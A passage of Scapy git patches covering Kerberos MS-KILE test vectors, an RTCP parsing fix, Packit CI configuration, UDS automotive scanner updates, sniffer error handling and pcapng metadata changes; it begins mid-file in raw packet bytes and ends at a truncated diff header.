\x14\xb6\xe0\x00\x00\x00\x00\x011j\x82\x01-0\x82\x01)\xa1\x03\x02\x01\x05\xa2\x03\x02\x01\n\xa3c0a0L\xa1\x03\x02\x01\x02\xa2E\x04C0A\xa0\x03\x02\x01\x12\xa2:\x048HHM\xec\xb0\x1c\x9bb\xa1\xca\xbf\xbc?-\x1e\xd8Z\xa5\xe0\x93\xba\x83X\xa8\xce\xa3MC\x93\xaf\x93\xbf!\x1e'O\xa5\x8e\x81Hx\xdb\x9f\rz(\xd9Ns'f\r\xb4\xf3pK0\x11\xa1\x04\x02\x02\x00\x80\xa2\t\x04\x070\x05\xa0\x03\x01\x01\xff\xa4\x81\xb70\x81\xb4\xa0\x07\x03\x05\x00@\x81\x00\x10\xa1\x120\x10\xa0\x03\x02\x01\x01\xa1\t0\x07\x1b\x05win1$\xa2\x0e\x1b\x0cDOMAIN.LOCAL\xa3!0\x1f\xa0\x03\x02\x01\x02\xa1\x180\x16\x1b\x06krbtgt\x1b\x0cDOMAIN.LOCAL\xa5\x11\x18\x0f20370913024805Z\xa6\x11\x18\x0f20370913024805Z\xa7\x06\x02\x04p\x1c\xc5\xd1\xa8\x150\x13\x02\x01\x12\x02\x01\x11\x02\x01\x17\x02\x01\x18\x02\x02\xffy\x02\x01\x03\xa9\x1d0\x1b0\x19\xa0\x03\x02\x01\x14\xa1\x12\x04\x10WIN1 ") enc = pkt[Kerberos].root.padata[0].padataValue -k = Key(enc.etype.val, key=hex_bytes("7fada4e566ae4fb270e2800a23ae87127a819d42e69b5e22de0ddc63da80096d")) +k = Key(enc.etype.val, key=bytes.fromhex("7fada4e566ae4fb270e2800a23ae87127a819d42e69b5e22de0ddc63da80096d")) ts = enc.decrypt(k) assert ts.patimestamp == "20220715171847Z" ts.pausec == 0x9a4db ++ [MS-KILE] test vectors +~ mock + += [MS-KILE] RC4 GSS_WrapEx (RFC4757) test vectors (sect 4.5) + +import mock +from scapy.libs.rfc3961 import Key, EncryptionType + +ssp = KerberosSSP() +ctx = KerberosSSP.CONTEXT(IsAcceptor=False, req_flags=GSS_C_FLAGS.GSS_C_CONF_FLAG) + +ctx.KrbSessionKey = Key(EncryptionType.RC4_HMAC, key=bytes.fromhex("81a2cb90af7fc2d19554a150d8185359")) +ctx.SendSeqNum = 0x60cbacd3 +Confounder = bytes.fromhex("5256f3fb630cf12a") + +with mock.patch('scapy.layers.kerberos.os.urandom', side_effect=lambda x: Confounder): + _msgs, sig = ssp.GSS_WrapEx( + ctx, + [ + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=bytes.fromhex("112233445566778899aabbccddeeff")), + ], + ) + +assert isinstance(sig, KRB_GSSAPI_Token) +assert sig.innerToken.TOK_ID == b"\x02\x01" +assert sig.innerToken.root.SGN_ALG == 0x11 +assert sig.innerToken.root.SEAL_ALG == 0x10 + +assert bytes(sig) == b'`+\x06\t*\x86H\x86\xf7\x12\x01\x02\x02\x02\x01\x11\x00\x10\x00\xff\xff\xe2\x9e\x8b\xbccH\xe7@\xeb\xaaa\x92D\xa1V\xa1;\\\xf6^\xf0G\xd5\x9d\x9b\xca:\x10\xee\x1f\xe93\xc1*/`H\x89\xf4\xab\xd7E!\xd5<*ou\x94\xa3\t\xf1\x7f\xaa\xe9\x95}\xaa\xb7\x9f\xd4F\xfe\x9bt\xa1\x00' + +decrypted = server.GSS_UnwrapEx( + srvcontext, + _msgs, + sig, +)[1].data +assert decrypted == dcerpc_data + += GSS_WrapEx/GSS_UnwrapEx: server answers back confidentiality + +with KrbRandomPatcher(): + _msgs, sig = server.GSS_WrapEx( + srvcontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=dcerpc_hdr), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=dcerpc_data), + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=dcerpc_sectrailer), + ], + ) + +assert _msgs[0].data == dcerpc_hdr +assert _msgs[1].data == b"\x9av\xf9 :e\x0f\xd8!\x1c\xc7\x076'a.NN\xcf\x0c\xec\x8c\x83\xb4\x9c'<%i\x17\xbe\xcc\x01 \x1d\x031\\Y\x92H\xe4\xd50W\x8e\xe0\xe85\xd8\xf5c[\x97Bl\x16\x12P\x03l\xdb\x99$\xef\x9a\x06\x85\x18\xcf\xc5\x91~\x88\xca\xb2D\xf8\xe5(+\xb30\r\xbf\xe8\xc7\x11\x18\xfa,&(\xc3l)c\x08%\xaf\x80\xe5u\xadw\x06\x15\xe8\xed\xfa\xb3\xe0\x1d\xb2\xdan\xcfb<\x01\x9d\xa6\xb4=W:Z\xb6\xbf\xe9\x1a\xc8g\x9d\x01\x87 Date: Sun, 14 Apr 2024 16:02:17 +0300 Subject: [PATCH 1250/1632] Fix RTCP parsing with SR or multiple RR (#4349) * rtcp: Add extract_padding to SenderInfo and ReceptionReport By default when parsing these packets parse everything as their "payload" but they are in fact fixed-size. Fixes Issue #4348 * rtcp: Add test demonstrating parsing of SR+RR --- scapy/contrib/rtcp.py | 6 ++++++ test/contrib/rtcp.uts | 20 ++++++++++++++++++++ 2 files changed, 26 insertions(+) diff --git a/scapy/contrib/rtcp.py b/scapy/contrib/rtcp.py index fbf039432ad..a41673870dd 100644 --- a/scapy/contrib/rtcp.py +++ b/scapy/contrib/rtcp.py @@ -51,6 +51,9 @@ class SenderInfo(Packet): IntField('sender_octet_count', None) ] + def extract_padding(self, p): + return "", p + class ReceptionReport(Packet): name = "Reception report" @@ -64,6 +67,9 @@ class ReceptionReport(Packet): IntField('delay_since_last_SR', None) ] + def extract_padding(self, p): + return "", p + _sdes_chunk_types = { 0: "END", diff --git a/test/contrib/rtcp.uts b/test/contrib/rtcp.uts index 13afe20eb59..0686016edf1 100644 --- a/test/contrib/rtcp.uts +++ b/test/contrib/rtcp.uts @@ -76,3 +76,23 @@ raw = b"\x81\xc9\x00\x07\xa2\xdf\x02\x72\x49\x6e\x93\xbd\x00\xff\xff\xff" \ b"\x30\x33\x34\x38\x38\x39\x30\x31\x40\x68\x6f\x73\x74\x2d\x65\x37" \ b"\x32\x64\x62\x34\x33\x64\x06\x09\x47\x53\x74\x72\x65\x61\x6d\x65" \ b"\x72\x00\x00\x00" + += format SR + 2xRR and parse back + +rtcp = RTCP() +rtcp.packet_type = 200 +rtcp.sourcesync = 0x01010101 +rtcp.sender_info.rtp_timestamp = 0x03030303 +rtcp.count = 2 +rtcp.report_blocks.append(ReceptionReport(sourcesync=0x04040404)) +rtcp.report_blocks.append(ReceptionReport(sourcesync=0x05050505)) +b = bytes(rtcp) +rtcp2 = RTCP(b) +assert rtcp2.count == 2 +assert rtcp2.length == 18 +assert rtcp2.sourcesync == 0x01010101 +assert rtcp2.sender_info.rtp_timestamp == 0x03030303 +assert len(rtcp2.sender_info.payload) == 0 +assert rtcp2.report_blocks[0].sourcesync == 0x04040404 +assert len(rtcp2.report_blocks[0].payload) == 0 +assert rtcp2.report_blocks[1].sourcesync == 0x05050505 From 86c7a05a1430a47a24d45705784b2e113fb3149d Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Sat, 20 Apr 2024 20:32:55 +0300 Subject: [PATCH 1251/1632] CI: run scapy on aarch64, i386, ppc64le, s390x and x86_64 on PRs (#4355) The script takes the Fedora package, edits the spec file to make it compatible with the upstream test suite and then it's all run on all those architectures on the latest stable Fedora release and Fedora Rawhide. (Rawhide is kind of a testing relase but it's useful in terms of catching things like https://github.com/secdev/scapy/issues/4280 reproducible with relatively new packages only). It was originally prompted by https://github.com/secdev/scapy/issues/3847 (where the Debian autopkgtest was run on big-endian and 32-bit machines) and should hopefully make it easier to catch various issues before they land. It has been tested since the beginning of 2023 so it should be stable at this point. --- .packit.yml | 52 ++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 .packit.yml diff --git a/.packit.yml b/.packit.yml new file mode 100644 index 00000000000..fb23a4c0702 --- /dev/null +++ b/.packit.yml @@ -0,0 +1,52 @@ +--- +# Docs: https://packit.dev/docs + +specfile_path: .packit_rpm/scapy.spec +files_to_sync: + - .packit.yml + - src: .packit_rpm/scapy.spec + dest: scapy.spec +upstream_package_name: scapy +downstream_package_name: scapy +upstream_tag_template: "v{version}" +srpm_build_deps: [] + +actions: + post-upstream-clone: + # Use the Fedora Rawhide specfile + - "git clone https://src.fedoraproject.org/rpms/scapy .packit_rpm --depth=1" + # Drop the "sources" file so rebase-helper doesn't think we're a dist-git + - "rm -fv .packit_rpm/sources" + - "sed -i '/^# check$/a%check\\n./test/run_tests -c test/configs/linux.utsc -K netaccess -K scanner -K manufdb' .packit_rpm/scapy.spec" + - "sed -i '/^BuildArch/aBuildRequires: can-utils' .packit_rpm/scapy.spec" + - "sed -i '/^BuildArch/aBuildRequires: libpcap' .packit_rpm/scapy.spec" + - "sed -i '/^BuildArch/aBuildRequires: openssl' .packit_rpm/scapy.spec" + - "sed -i '/^BuildArch/aBuildRequires: tcpdump' .packit_rpm/scapy.spec" + - "sed -i '/^BuildArch/aBuildRequires: wireshark' .packit_rpm/scapy.spec" + - "sed -i '/^BuildArch/aBuildRequires: python3-tox-current-env' .packit_rpm/scapy.spec" + - "sed -i '/^BuildArch/aBuildRequires: python3-mock' .packit_rpm/scapy.spec" + - "sed -i '/^BuildArch/aBuildRequires: python3-ipython' .packit_rpm/scapy.spec" + - "sed -i '/^BuildArch/aBuildRequires: python3-brotli' .packit_rpm/scapy.spec" + - "sed -i '/^BuildArch/aBuildRequires: python3-can' .packit_rpm/scapy.spec" + - "sed -i '/^BuildArch/aBuildRequires: python3-coverage' .packit_rpm/scapy.spec" + - "sed -i '/^BuildArch/aBuildRequires: python3-cryptography' .packit_rpm/scapy.spec" + - "sed -i '/^BuildArch/aBuildRequires: python3-tkinter' .packit_rpm/scapy.spec" + - "sed -i '/^BuildArch/aBuildRequires: python3-zstandard' .packit_rpm/scapy.spec" + - "sed -i '/^BuildArch/aBuildRequires: samba' .packit_rpm/scapy.spec" + - "sed -i '/^BuildArch/aBuildRequires: samba-client' .packit_rpm/scapy.spec" + - "sed -i 's/^\\(TOX_PARALLEL_NO_SPINNER=1 tox\\)/\\1 --current-env/' .config/ci/test.sh" + +jobs: +- job: copr_build + trigger: pull_request + targets: + - fedora-latest-stable-aarch64 + - fedora-latest-stable-i386 + - fedora-latest-stable-ppc64le + - fedora-latest-stable-s390x + - fedora-latest-stable-x86_64 + - fedora-rawhide-aarch64 + - fedora-rawhide-i386 + - fedora-rawhide-ppc64le + - fedora-rawhide-s390x + - fedora-rawhide-x86_64 From cd2fed92557810265693d716558f0cd34eddb006 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sat, 20 Apr 2024 19:50:32 +0200 Subject: [PATCH 1252/1632] Set manual_trigger in packit This PR: - enables manual_trigger in packit I do think that it's overkill for every PR to be checked against all of Fedora's plateforms. Packit should probably, at least for now, only be triggered manually when the PRs are related to components that might break on unorthodox plateforms. --- .packit.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.packit.yml b/.packit.yml index fb23a4c0702..43cbb64b72a 100644 --- a/.packit.yml +++ b/.packit.yml @@ -39,6 +39,7 @@ actions: jobs: - job: copr_build trigger: pull_request + manual_trigger: true targets: - fedora-latest-stable-aarch64 - fedora-latest-stable-i386 From e7ae05a513b844d6eef84fcf129cb78c114fdc40 Mon Sep 17 00:00:00 2001 From: Ben Gardiner Date: Tue, 23 Apr 2024 14:55:45 -0400 Subject: [PATCH 1253/1632] automotive/uds: special case to allow sending malformed 7f request (#4347) Similar to the motivation in https://github.com/secdev/scapy/issues/3947#issuecomment-1479767620 : I would like to scan all the possible services including a nonsense/malformed/invalid request to a 7f service. v2: adding unit test for range(256) of UDS Scanner and trying to avoid expensive checks in .hashret() (@polybassa) v3: flake8 formatting fixes --- scapy/contrib/automotive/uds.py | 3 +- .../automotive/scanner/uds_scanner.uts | 45 +++++++++++++++++++ test/contrib/automotive/uds.uts | 5 +++ 3 files changed, 52 insertions(+), 1 deletion(-) diff --git a/scapy/contrib/automotive/uds.py b/scapy/contrib/automotive/uds.py index f69bdd5d0a8..64d191f1c50 100644 --- a/scapy/contrib/automotive/uds.py +++ b/scapy/contrib/automotive/uds.py @@ -124,7 +124,8 @@ def answers(self, other): def hashret(self): # type: () -> bytes - if self.service == 0x7f: + if self.service == 0x7f and len(self) >= 2 and \ + (bytes(self.payload) != b'\x00' and bytes(self.payload) != b'\x00\x00'): return struct.pack('B', self.requestServiceId & ~0x40) return struct.pack('B', self.service & ~0x40) diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index df72230dd8d..7c7bb6e58fc 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -1097,6 +1097,51 @@ tc.show() assert len(tc.results_with_negative_response) == 4 += UDS_ServiceEnumerator, all range + +def req_handler(resp, req): + if req.service != 0x22: + return False + if len(req) == 1: + resp.negativeResponseCode="generalReject" + return True + if len(req) == 2: + resp.negativeResponseCode="incorrectMessageLengthOrInvalidFormat" + return True + if len(req) == 3: + resp.negativeResponseCode="requestOutOfRange" + return True + return False + +resps = [EcuResponse(None, [UDS()/UDS_NR(negativeResponseCode="subFunctionNotSupported", requestServiceId="ReadDataByIdentifier")], req_handler)] + +es = [UDS_ServiceEnumerator] + +debug_dissector_backup = conf.debug_dissector + +# This Enumerator is sending corrupted Packets, therefore we need to disable the debug_dissector +conf.debug_dissector = False +scanner = executeScannerInVirtualEnvironment( + resps, es, UDS_ServiceEnumerator_kwargs={"request_length": 3, "scan_range": range(256)}, unstable_socket=False) +conf.debug_dissector = debug_dissector_backup + +assert scanner.scan_completed +assert scanner.progress() > 0.95 +tc = scanner.configuration.test_cases[0] + +assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + +tc.show() + +assert len(tc.scanned_states) == 1 + +result = tc.show(dump=True) + +assert "incorrectMessageLengthOrInvalidFormat" in result +assert "requestOutOfRange" in result + + Cleanup = Delete testsockets diff --git a/test/contrib/automotive/uds.uts b/test/contrib/automotive/uds.uts index 2c58d781e32..10691710a91 100644 --- a/test/contrib/automotive/uds.uts +++ b/test/contrib/automotive/uds.uts @@ -1412,6 +1412,11 @@ rftpr_build = UDS()/UDS_RFTPR(modeOfOperation=0x1, compressionMethod=1, encryptingMethod=1) assert bytes(rftpr_build) == bytes(rftpr) += Check (invalid) UDS_NRC, no reply-to service + +nrc = UDS(b'\x7f') +assert nrc.service == 0x7f + = Check UDS_NRC nrc = UDS(b'\x7f\x22\x33') From 5ac85af73a765638900b1f9de03d48ed24211b53 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sat, 27 Apr 2024 15:21:41 +0200 Subject: [PATCH 1254/1632] UDS Scanner Update (#4362) --- .../automotive/scanner/configuration.py | 1 + .../contrib/automotive/scanner/enumerator.py | 34 ++++++++++++++-- scapy/contrib/automotive/scanner/executor.py | 39 ++++++++++++++----- scapy/utils.py | 13 ++++++- .../automotive/scanner/uds_scanner.uts | 4 +- 5 files changed, 77 insertions(+), 14 deletions(-) diff --git a/scapy/contrib/automotive/scanner/configuration.py b/scapy/contrib/automotive/scanner/configuration.py index ecee0db436b..f7342bc11b8 100644 --- a/scapy/contrib/automotive/scanner/configuration.py +++ b/scapy/contrib/automotive/scanner/configuration.py @@ -115,6 +115,7 @@ def __init__(self, test_cases, **kwargs): self.verbose = kwargs.get("verbose", False) self.debug = kwargs.get("debug", False) self.unittest = kwargs.pop("unittest", False) + self.delay_enter_state = kwargs.pop("delay_enter_state", 0) self.state_graph = Graph() self.test_cases = list() # type: List[AutomotiveTestCaseABC] self.stages = list() # type: List[StagedAutomotiveTestCase] diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index b0a6d0cd27d..98210f86a37 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -18,7 +18,7 @@ from scapy.compat import orb from scapy.contrib.automotive import log_automotive from scapy.error import Scapy_Exception -from scapy.utils import make_lined_table, EDecimal +from scapy.utils import make_lined_table, EDecimal, PeriodicSenderThread from scapy.packet import Packet from scapy.contrib.automotive.ecu import EcuState, EcuResponse from scapy.contrib.automotive.scanner.test_case import AutomotiveTestCase, \ @@ -79,7 +79,9 @@ class ServiceEnumerator(AutomotiveTestCase, metaclass=abc.ABCMeta): 'stop_event': (threading.Event, None), 'debug': (bool, None), 'scan_range': ((list, tuple, range), None), - 'unittest': (bool, None) + 'unittest': (bool, None), + 'disable_tps_while_sending': (bool, None), + 'inter': ((int, float), lambda x: x >= 0), }) _supported_kwargs_doc = AutomotiveTestCase._supported_kwargs_doc + """ @@ -119,7 +121,12 @@ class ServiceEnumerator(AutomotiveTestCase, metaclass=abc.ABCMeta): :param bool debug: Enables debug functions during execute. :param Event stop_event: Signals immediate stop of the execution. :param scan_range: Specifies the identifiers to be scanned. - :type scan_range: list or tuple or range or iterable""" + :type scan_range: list or tuple or range or iterable + :param disable_tps_while_sending: Temporary disables a TesterPresentSender + to not interact with a seed request. + :type disable_tps_while_sending: bool + :param inter: delay between two packets during sending + :type inter: int or float""" def __init__(self): # type: () -> None @@ -130,6 +137,7 @@ def __init__(self): self._retry_pkt = defaultdict(list) # type: Dict[EcuState, Union[Packet, Iterable[Packet]]] # noqa: E501 self._negative_response_blacklist = [0x10, 0x11] # type: List[int] self._requests_per_state_estimated = None # type: Optional[int] + self._tester_present_sender = None # type: Optional[PeriodicSenderThread] @staticmethod @abc.abstractmethod @@ -272,6 +280,13 @@ def runtime_estimation(self): return pkts_tbs, pkts_snt, float(pkts_snt) / pkts_tbs + def pre_execute(self, socket, state, global_configuration): + # type: (_SocketUnion, EcuState, AutomotiveTestCaseExecutorConfiguration) -> None # noqa: E501 + try: + self._tester_present_sender = global_configuration["tps"] + except KeyError: + self._tester_present_sender = None + def execute(self, socket, state, **kwargs): # type: (_SocketUnion, EcuState, Any) -> None self.check_kwargs(kwargs) @@ -279,6 +294,8 @@ def execute(self, socket, state, **kwargs): count = kwargs.pop('count', None) execution_time = kwargs.pop("execution_time", 1200) stop_event = kwargs.pop("stop_event", None) # type: Optional[threading.Event] # noqa: E501 + disable_tps = kwargs.pop("disable_tps_while_sending", False) + inter = kwargs.pop("inter", 0) self._prepare_runtime_estimation(**kwargs) @@ -306,8 +323,19 @@ def execute(self, socket, state, **kwargs): "Start execution of enumerator: %s", time.ctime()) for req in it: + if stop_event: + stop_event.wait(timeout=inter) + else: + time.sleep(inter) + + if disable_tps and self._tester_present_sender: + self._tester_present_sender.disable() + res = self.sr1_with_retry_on_error(req, socket, state, timeout) + if disable_tps and self._tester_present_sender: + self._tester_present_sender.enable() + self._store_result(state, req, res) if self._evaluate_response(state, req, res, **kwargs): diff --git a/scapy/contrib/automotive/scanner/executor.py b/scapy/contrib/automotive/scanner/executor.py index 5150c285ce7..6d58bc72d26 100644 --- a/scapy/contrib/automotive/scanner/executor.py +++ b/scapy/contrib/automotive/scanner/executor.py @@ -63,7 +63,7 @@ def _initial_ecu_state(self): def __init__( self, - socket, # type: _SocketUnion + socket, # type: Optional[_SocketUnion] reset_handler=None, # type: Optional[Callable[[], None]] reconnect_handler=None, # type: Optional[Callable[[], _SocketUnion]] # noqa: E501 test_cases=None, @@ -74,8 +74,8 @@ def __init__( # The TesterPresentSender can interfere with a test_case, since a # target may only allow one request at a time. # The SingleConversationSocket prevents interleaving requests. - if not isinstance(socket, SingleConversationSocket): - self.socket = SingleConversationSocket(socket) + if socket and not isinstance(socket, SingleConversationSocket): + self.socket = SingleConversationSocket(socket) # type: Optional[_SocketUnion] # noqa: E501 else: self.socket = socket @@ -158,7 +158,8 @@ def reconnect(self): # type: () -> None if self.reconnect_handler: try: - self.socket.close() + if self.socket: + self.socket.close() except Exception as e: log_automotive.exception( "Exception '%s' during socket.close", e) @@ -170,7 +171,7 @@ def reconnect(self): else: self.socket = socket - if self.socket.closed: + if self.socket and self.socket.closed: raise Scapy_Exception( "Socket closed even after reconnect. Stop scan!") @@ -179,7 +180,7 @@ def execute_test_case(self, test_case, kill_time=None): """ This function ensures the correct execution of a testcase, including the pre_execute, execute and post_execute. - Finally the testcase is asked if a new edge or a new testcase was + Finally, the testcase is asked if a new edge or a new testcase was generated. :param test_case: A test case to be executed @@ -188,6 +189,10 @@ def execute_test_case(self, test_case, kill_time=None): :return: None """ + if not self.socket: + log_automotive.warning("Socket is None! Leaving execute_test_case") + return + test_case.pre_execute( self.socket, self.target_state, self.configuration) @@ -231,6 +236,10 @@ def check_new_testcases(self, test_case): def check_new_states(self, test_case): # type: (AutomotiveTestCaseABC) -> None + if not self.socket: + log_automotive.warning("Socket is None! Leaving check_new_states") + return + if isinstance(test_case, StateGenerator): edge = test_case.get_new_edge(self.socket, self.configuration) if edge: @@ -310,9 +319,11 @@ def scan(self, timeout=None): if isinstance(e, OSError): log_automotive.exception( "OSError occurred, closing socket") - self.socket.close() - if cast(SuperSocket, self.socket).closed and \ - self.reconnect_handler is None: + if self.socket: + self.socket.close() + if (self.socket + and cast(SuperSocket, self.socket).closed + and self.reconnect_handler is None): log_automotive.critical( "Socket went down. Need to leave scan") raise e @@ -351,6 +362,8 @@ def enter_state_path(self, path): return False edge = (self.target_state, next_state) + self.configuration.stop_event.wait( + timeout=self.configuration.delay_enter_state) if not self.enter_state(*edge): self.state_graph.downrate_edge(edge) self.cleanup_state() @@ -367,6 +380,10 @@ def enter_state(self, prev_state, next_state): :param next_state: Desired state :return: True, if state could be changed successful """ + if not self.socket: + log_automotive.warning("Socket is None! Leaving enter_state") + return False + edge = (prev_state, next_state) funcs = self.state_graph.get_transition_tuple_for_edge(edge) @@ -393,6 +410,10 @@ def cleanup_state(self): Executes all collected cleanup functions from a traversed path :return: None """ + if not self.socket: + log_automotive.warning("Socket is None! Leaving cleanup_state") + return + for f in self.cleanup_functions: if not callable(f): continue diff --git a/scapy/utils.py b/scapy/utils.py index 85e7a423dcc..c6ebd97eaf3 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -3673,16 +3673,27 @@ def __init__(self, sock, pkt, interval=0.5, ignore_exceptions=True): self._pkts = pkt self._socket = sock self._stopped = threading.Event() + self._enabled = threading.Event() + self._enabled.set() self._interval = interval self._ignore_exceptions = ignore_exceptions threading.Thread.__init__(self) + def enable(self): + # type: () -> None + self._enabled.set() + + def disable(self): + # type: () -> None + self._enabled.clear() + def run(self): # type: () -> None while not self._stopped.is_set() and not self._socket.closed: for p in self._pkts: try: - self._socket.send(p) + if self._enabled.is_set(): + self._socket.send(p) except (OSError, TimeoutError) as e: if self._ignore_exceptions: return diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index 7c7bb6e58fc..32ab7bc369b 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -25,6 +25,8 @@ from scapy.contrib.automotive.ecu import * load_layer("can") +conf.debug_dissector = False + = Define Testfunction @@ -662,7 +664,7 @@ resps = [EcuResponse(None, [UDS()/UDS_CCPR(controlType=1)]), es = [UDS_CCEnumerator] -scanner = executeScannerInVirtualEnvironment(resps, es) +scanner = executeScannerInVirtualEnvironment(resps, es, inter=0.001) assert scanner.scan_completed assert scanner.progress() > 0.95 From 6ea71ea6527109fb1102a843b55562c82e367def Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sat, 27 Apr 2024 15:26:03 +0200 Subject: [PATCH 1255/1632] Reworked hashret in uds.py after #4347 (#4364) --- scapy/contrib/automotive/uds.py | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/scapy/contrib/automotive/uds.py b/scapy/contrib/automotive/uds.py index 64d191f1c50..67a7bb59e52 100644 --- a/scapy/contrib/automotive/uds.py +++ b/scapy/contrib/automotive/uds.py @@ -124,9 +124,8 @@ def answers(self, other): def hashret(self): # type: () -> bytes - if self.service == 0x7f and len(self) >= 2 and \ - (bytes(self.payload) != b'\x00' and bytes(self.payload) != b'\x00\x00'): - return struct.pack('B', self.requestServiceId & ~0x40) + if self.service == 0x7f and len(self) >= 3: + return struct.pack('B', bytes(self)[1] & ~0x40) return struct.pack('B', self.service & ~0x40) From 78b7c2427b85aee9ce77e22bba94bda83fdf4a66 Mon Sep 17 00:00:00 2001 From: Brett Sullivan <98055848+bsullivan19@users.noreply.github.com> Date: Sat, 27 Apr 2024 10:08:00 -0400 Subject: [PATCH 1256/1632] Add `stop_filter` to SndRcvHandler (#4361) * #4360: Add stop_filter parameter to SndRcvHandler Added stop_filter param to SndRcvHandler.__init__(). Pass stop_filter to AsyncSniffer._run in SndRcvHandler._sndrcv_rcv. Check if SndRcvHandler.sniffer is running before stopping in SndRcvHandler._process_packet. Updated _DOC_SNDRCV_PARAMS documentation to include new parameter. * Resolve code style errors --- scapy/sendrecv.py | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 8bb97f66f58..02ef8cf9aec 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -93,6 +93,8 @@ class debug: :param threaded: if True, packets will be sent in an individual thread :param session: a flow decoder used to handle stream of packets :param chainEX: if True, exceptions during send will be forwarded + :param stop_filter: Python function applied to each packet to determine if + we have to stop the capture after this packet. """ @@ -127,7 +129,8 @@ def __init__(self, _flood=None, # type: Optional[_FloodGenerator] threaded=False, # type: bool session=None, # type: Optional[_GlobSessionType] - chainEX=False # type: bool + chainEX=False, # type: bool + stop_filter=None # type: Optional[Callable[[Packet], bool]] ): # type: (...) -> None # Instantiate all arguments @@ -148,6 +151,7 @@ def __init__(self, self.timeout = timeout self.session = session self.chainEX = chainEX + self.stop_filter = stop_filter self._send_done = False self.notans = 0 self.noans = 0 @@ -294,7 +298,7 @@ def _process_packet(self, r): sentpkt._answered = 1 break if self._send_done and self.noans >= self.notans and not self.multi: - if self.sniffer: + if self.sniffer and self.sniffer.running: self.sniffer.stop(join=False) if not ok: if self.verbose > 1: @@ -315,6 +319,7 @@ def _sndrcv_rcv(self, callback): store=False, opened_socket=self.rcv_pks, session=self.session, + stop_filter=self.stop_filter, started_callback=callback, chainCC=self.chainCC, ) From 98257f3713567dd1e731463cb959ba06c7c27e6f Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sat, 27 Apr 2024 18:55:42 +0200 Subject: [PATCH 1257/1632] AsyncSniffer catch errors on join() (#4359) --- scapy/sendrecv.py | 11 ++++++++++- test/regression.uts | 10 ++++++++++ 2 files changed, 20 insertions(+), 1 deletion(-) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 02ef8cf9aec..c83a612777d 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -1077,12 +1077,19 @@ def __init__(self, *args, **kwargs): self.running = False self.thread = None # type: Optional[Thread] self.results = None # type: Optional[PacketList] + self.exception = None # type: Optional[Exception] def _setup_thread(self): # type: () -> None + def _run_catch(self=self, *args, **kwargs): + # type: (Any, *Any, **Any) -> None + try: + self._run(*args, **kwargs) + except Exception as ex: + self.exception = ex # Prepare sniffing thread self.thread = Thread( - target=self._run, + target=_run_catch, args=self.args, kwargs=self.kwargs, name="AsyncSniffer" @@ -1337,6 +1344,8 @@ def join(self, *args, **kwargs): # type: (*Any, **Any) -> None if self.thread: self.thread.join(*args, **kwargs) + if self.exception is not None: + raise self.exception @conf.commands.register diff --git a/test/regression.uts b/test/regression.uts index 5b5737a570e..8aa4dffc5c7 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1729,6 +1729,16 @@ def _test(): retry_test(_test) += Test sniffing with AsyncSniffer on failed + +try: + sniffer = AsyncSniffer(iface="this_interface_does_not_exists") + sniffer.start() + sniffer.join() + assert False, "Should have errored by now" +except (OSError, Scapy_Exception): + assert True + = Sending a TCP syn 'forever' at layer 2 and layer 3 ~ netaccess needs_root IP def _test(): From 56b4fa4adc6603b410c87c64a3ea3278ef69ca01 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jo=C3=A3o=20Machado?= <63718541+jcpvdm@users.noreply.github.com> Date: Sat, 27 Apr 2024 18:39:08 +0100 Subject: [PATCH 1258/1632] pcapng enhancements (idb,epb) and some fixes (#4342) * pcapng enhancements (idb,epb) and some fixes Based on draft-ietf-opsawg-pcapng-latest, 5 March 2024. -map packet.sniffed_on to unique IDB id. When writing, if_name option and linktype is populated based on the first packet seen with a unique sniffed_on string. -map packet.direction to EPB flags inbound/outbound direction bits. Remaining flag bits not implemented. -simplified RawPcapNgReader._read_options() and moved (code,value) treatment to the caller since codes of same type can have different meaning for different type of blocks. -Fix RawPcapNgReader._read_block_shb() and _write_block_shb(). --------- Co-authored-by: Guillaume Valadon --- scapy/packet.py | 4 + scapy/utils.py | 231 +++++++++++++++++++++++++++++++++----------- test/regression.uts | 60 +++++++++++- 3 files changed, 233 insertions(+), 62 deletions(-) diff --git a/scapy/packet.py b/scapy/packet.py index 26f046a9771..e92f0710bb8 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -430,6 +430,8 @@ def copy(self) -> Self: clone.payload.add_underlayer(clone) clone.time = self.time clone.comment = self.comment + clone.direction = self.direction + clone.sniffed_on = self.sniffed_on return clone def _resolve_alias(self, attr): @@ -1140,6 +1142,8 @@ def clone_with(self, payload=None, **kargs): ) pkt.wirelen = self.wirelen pkt.comment = self.comment + pkt.sniffed_on = self.sniffed_on + pkt.direction = self.direction if payload is not None: pkt.add_payload(payload) return pkt diff --git a/scapy/utils.py 